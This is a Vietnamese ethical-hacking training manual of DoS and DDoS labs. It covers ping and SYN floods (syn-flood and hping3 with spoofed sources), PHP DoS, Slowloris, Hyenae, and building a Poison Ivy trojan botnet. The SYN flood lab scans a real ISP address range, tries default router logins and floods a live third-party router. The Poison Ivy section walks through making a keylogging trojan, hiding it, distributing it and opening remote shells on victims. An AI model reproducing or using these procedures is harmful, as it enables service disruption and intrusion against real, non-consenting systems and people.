[Type text]

Athena Ethical
Hacker Lab
DoS và DDoS Module
Ping of Dealth
SYN Flood
Hping3 SYN Flood
PHP DoS
Apache DoS Slowloris
Poison Ivy
Hyenae
 LAB DOS và DDoS attack
1. Ping of Dealth Attack

- Sơ đồ bài lab
Router

234 254
192.168.1.0/24
Attacker

- Trong hệ điều hành Window để ta có thể sử dụng lệnh “ping IP -t -l 5000” để ping một
destination một cách liên tục

- Nếu như bạn muốn mở cùng một lúc 20 cửa sổ Window ping thì ta có thể kết hợp với câu lệnh
For như sau “ For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000 ” như vậy chương
trình sẽ mở ra cùng một lúc 20 cửa sổ window ping liên tục đến IP 192.168.1.254

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 2. Syn Flood Attack
- Sơ đồ bài lab như sau

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 Router

234 254
192.168.1.0/24
Attacker
118.68.26.1

- ở bài lab này ta sẽ thử thực hiện SYN Flood Attack vào router ADSL. Đầu tiên ta xác định xem
hiện tại đang có bao nhiêu router ADSL đang mở port 80 bằng công cụ Nmap
- Giả sử IP Public hiện thời của mình đang là 118.68.226.103, ta sử dụng câu lệnh “nmap –sS –p
80 118.68.226.1/24 ” để scan

Ta thực hiện scan và xuất ra file là scan_adsl.txt

Kiểm tra nội dung file scan_adsl.txt và chọn ra một IP để ta làm lab tiếp tục

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Ví dụ trong 1 đoạn file scan_adsl.txt có nội dung như bên dưới nghĩa là IP 118.68.226.7 đang
mở port 80

Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7)

Host is up (0.037s latency).
PORT STATE SERVICE
80/tcp open http

- Ta vào trình duyệt web để kiểm tra IP trang web của IP này và thử nhập vào username: admin và
password admin mặc định

- Ta sẽ thực hiện syn flood attack vào port 80 trên router ADSL này bằng công cụ syn-flood-
alpha1.tar.gz. Ta thực hiện quá trình cài đặt giống như bên dưới.

root@bt:~/Desktop# ls
scan_adsl.txt syn-flood-alpha1.tar.gz
root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz
syn-flood/
syn-flood/Makefile

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 syn-flood/gpl.txt
syn-flood/syn-flood.cpp
root@bt:~/Desktop# cd syn-flood
root@bt:~/Desktop/syn-flood# ls
gpl.txt Makefile syn-flood.cpp
root@bt:~/Desktop/syn-flood# make
g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp
g++ -o syn-flood syn-flood.o

- Ta thực hiện quá trình tấn công bằng câu lệnh bên dưới để gửi ra 100000 gói tin syn

root@bt:~/Desktop/syn-flood# ./syn-flood
Usage: ./syn-flood --ip IP --port PORT [verbose]
-h --help Display this usage information.
-i --ip Destination IP address.
-p --port Destination port.
-n --num Number of packets to send.
-v --verbose Print verbose messages.

root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000

Sent 1000000 packets.

- Ta sử dụng chương trình Wireshark để phân tích quá trình hoạt động của công cụ này thì thấy
chương trình đã gửi ra 100000 gói tin TCP SYN đến victim và router adsl với IP 118.68.226.7 với
các source IP là các IP giả khác nhau.

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 3. Sử Dụng Hping3 thực hiện Syn Flood Attack

- Sơ đồ bài lab

Attacker
100
Router

254

101 192.168.1.0/24

- Máy victim có IP là 192.168.1.101/24 ( Window XP ) và máy attacker có IP là 192.168.1.100/24 (

Back Track 5 )
- Đầu tiên ta thực hiện quá trình scan các port đang open của Victim bằng công cụ Nmap

root@bt:~# nmap -sS 192.168.1.101

PORT STATE SERVICE
139/tcp open netbios-ssn

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 445/tcp open microsoft-ds
MAC Address: 00:0C:29:9F:87:19 (VMware)

- Ta sử dụng hping3 SYN Flood vào port đang mở là 445

root@bt:~#man hping3
=> Kiểm tra các thông số của hping3

root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100

=> thực hiện SYN FLOOD vào victim có IP là 192.168.1.101

-a giả dạng IP 192.168.1.254

-p ở port 445
-S thực hiện Syn Flood attack
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.

root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 –c 100000

-c nghĩa là count, ta sẽ gửi 100000 đến victim

- Tại máy Victim nếu như bị SYN Flood ta kiểm tra trạng thái kết nối bằng lệnh “netstat -ano” thì
thấy xuất hiện rất nhiều kết nối SYN

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 4. PHP DoS
- Ta sẽ thực hiện upload source PHP DoS lên một Web Server, và sử dụng server này để tấn công
một server khác.
- Đầu tiên ta thực hiện việc upload source vào chương trình PHP DoS vào Web Server

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Restart lại dịch vụ apache

- Ta sử dụng trình duyệt web kết vào trang PHP DoS và thực hiện tấn công vào victim nào đó

- Sau khi attack xong thì chương trình sẽ thống kê lại cho ta số lượng gói tin. –

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Sử dụng wireshark để capture lại traffic thì ta sẽ có được hình như bên dưới.

5. Apache DoS Slowloris

- Slowrist ảnh hưởng đến Web Server Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer.. còn
các web server của Window IIS 6.0, IIS 7.0 thì không ảnh hưởng bởi công cụ này
- Download source code chương trình tại trang http://ha.ckers.org/slowloris/slowloris.pl và tạo
thành file có tên là slowloris.pl
- Gán cho chương trình có quyền thực thi

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Kiểm tra xem chương trình slowloris để ước đoán giá trị timeout

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Thực hiện DoS vào một victim bằng câu lệnh “perl ./slowloris.pl -dns www.abc.com -timeout
2000 -num 500 -tcpto 5”, ta nên xem thêm trong phần help của chương trình để biết thêm ý
nghĩa của các biến

6. Sử Dụng Poison Ivy tạo Botnet

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Đầu tiên ta cần phải tạo ra một file Remote Access Trojan và gửi file này đến victim. Sau khi
install, máy victim trở thành zombie bị điều khiển bởi attacker.
- Decompress chương trình và thực thi file “Poison Ivy”

- Click “I Agree”, Sau đó chọn mục “New Server”

- Tiếp tục ta chọn tạo ra một New Profile

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Ta nhập vào các thông số:
o IP của máy đóng vai trò là server để zombie connect về và port tương ứng. Mặc định
chương trình dùng port 3460. Mặt khác ta có thể tạo ra nhiều profile khác nhau, mỗi
profile tương ứng với 1 port trên máy attacker
o Nhập vào mục ID: ví dụ là server_test
o Password để đăng nhập có thể sử là password dạng static hoặc là sử dụng “dynamic
key”
o Tiếp tục click Next ở góc phải màn hình

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Tiếp tục chương trình sẽ chuyển qua mục “Install”. Ta cần nhập vào các thông số sau
o HKLM/Run Name:
o ActiveX Key Name
o Copy File: ta nhập vào với tên có dạng là .exe hoặc là dạng .scr
o Ta có thể chọn dạng Copy to Alternate Data Stream để ẩn file

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Click Next chương trình chuyển ở phần Advance. Ta có thể chọn các tính năng Key logger,
Format dạng PE…

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Click Next chương trình chuyển qua mục “Build”, ta có thể chuyển icon của file zombie, Click
Generate , xác định vị trí lưu trữ, tên file zombie…

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân
 - Ở vị trí máy attacker, ta sử dụng tính năng New Client để quản lý các kết nối từ các zombie, chọn
vào tên Profile mà attacker đã tạo.

- Chương trình yêu cầu ta phải nhập vào PASSWORD hoặc là ta phải LOAD KEY tùy thuộc vào
phương thức password cấu hình ở trên

- Tiếp tục ta thực hiện công việc phát tán file zombie dos_server.exe

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Sau khi client kích hoạt file dos_server.exe, ta kiểm tra các kết nối ta thấy xuất hiện một kết nối

- Ta Double-click vào dòng biểu thị cho client, để hiển thị đầy đủ các tác vụ mà attacker có thể
làm đối với zombie ( tùy thuộc vào cấu hình ban đầu )

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 Ví dụ ta chọn Remote Shell và Active để có được giao diện dòng lệnh của zombie

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân
 7. Dos và DdoS bằng công cụ Hyenae
- Download chương trình tại http://sourceforge.net/projects/hyenae/files/
- Chương trình này cho phép ta thực hiện tấn công DoS và DdoS. Để thực hiện DdoS ta cần phải
install Hyenae daemon trên 1 máy, sau đó sử dụng Hyenae Front End ( giao diện ) hoặc Hyenae (
dòng lệnh để điều khiển )
- Trong bài lab này ta sẽ install Hyenae daemon trên máy Window server 2003 (192.168.1.100/24)
và sử dụng Window XP (192.168.1.101/24) làm client điều khiển.

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Đầu tiên ta sẽ cấu hình hyenaed kiểm tra các card trong máy tính
C:\>hyenaed.exe -l
 Để kiểm tra các card mạng được nhận trong chương trình
 Giả sử chương trình nhận card Intel Pro/1000 MT được nhận là số 1

- Cấu hình hyenaed.exe lắng nghe trên máy tính server 2003
C:\>hyenaed.exe -I 1 -a 192.168.1.100 –p 8888 –u 10000 –k 123abc!!!
-I: card kết nối vào
-a: bind với IP của máy hoạt động chương trình hyenaed
-p: port
-u: số lượng packet gửi cho mỗi lần kết nối

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 - Sử dụng hyenae.exe dạng front end để kết nối. Tuy nhiên chương trình sẽ bị lỗi. Ta sử dụng câu
lệnh bên dưới và thực thi ở giao diện dòng lệnh

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân

 Chú ý: thêm vào dấu “+” kết nối giữa 192.168.1.15@8888+123abc!!!

Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân